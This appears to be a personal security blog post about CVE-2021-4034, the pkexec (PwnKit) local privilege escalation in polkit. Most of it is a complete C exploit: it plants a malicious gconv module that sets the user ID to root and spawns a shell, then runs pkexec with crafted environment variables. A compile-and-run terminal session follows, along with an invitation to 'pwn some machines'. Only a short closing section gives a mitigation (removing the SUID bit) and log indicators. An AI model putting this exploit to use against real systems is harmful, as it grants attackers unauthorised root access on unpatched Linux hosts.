Description

A local privilege escalation vulnerability was found on polkit’s pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn’t handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it’ll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.

CVE

CVE-2021-4034

Exploit Code Below;

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell = 
  "#include <stdio.h>\n"
  "#include <stdlib.h>\n"
  "#include <unistd.h>\n\n"
  "void gconv() {}\n"
  "void gconv_init() {\n"
  "  setuid(0); setgid(0);\n"
  "  seteuid(0); setegid(0);\n"
  "  system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
  "  exit(0);\n"
  "}";

int main(int argc, char *argv[]) {
  FILE *fp;
  system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
  system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
  fp = fopen("pwnkit/pwnkit.c", "w");
  fprintf(fp, "%s", shell);
  fclose(fp);
  system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
  char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
  execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}

Exploiting Target Below;

Save exploit in a file name exploit.c or anything you like but it must end with .c let jump in already to get root lol.

┌──(muzec㉿Muzec-Security)-[~]
└─$ pkexec --version                                                                                                                                             127 ⨯
pkexec version 0.105
                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~]
└─$ cat /etc/issue
Kali GNU/Linux Rolling \n \l

                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~]
└─$ uname -a             
Linux Muzec-Security 5.10.0-kali4-amd64 #1 SMP Debian 5.10.19-1kali1 (2021-03-03) x86_64 GNU/Linux
                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~]
└─$ lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:        2021.1
Codename:       kali-rolling
                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~]
└─$ nano exploit.c 
                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~]
└─$ gcc exploit.c -o exploit

Now that we have compile it let run it and have a shining root .

Awesome right?? Now go ahead and pwn some machines wink: wink:

If no patches are available for your Linux distro, as a short-term solution, you can remove the SUID-bit from pkexec:

chmod 0755 /usr/bin/pkexec

Qualys also notes that the exploitation technique leaves traces in logs, that say either “The value for the SHELL variable was not found the /etc/shells file…” or “The value for environment variable … contains suspicious content.”

Greeting From Muzec

Back To Home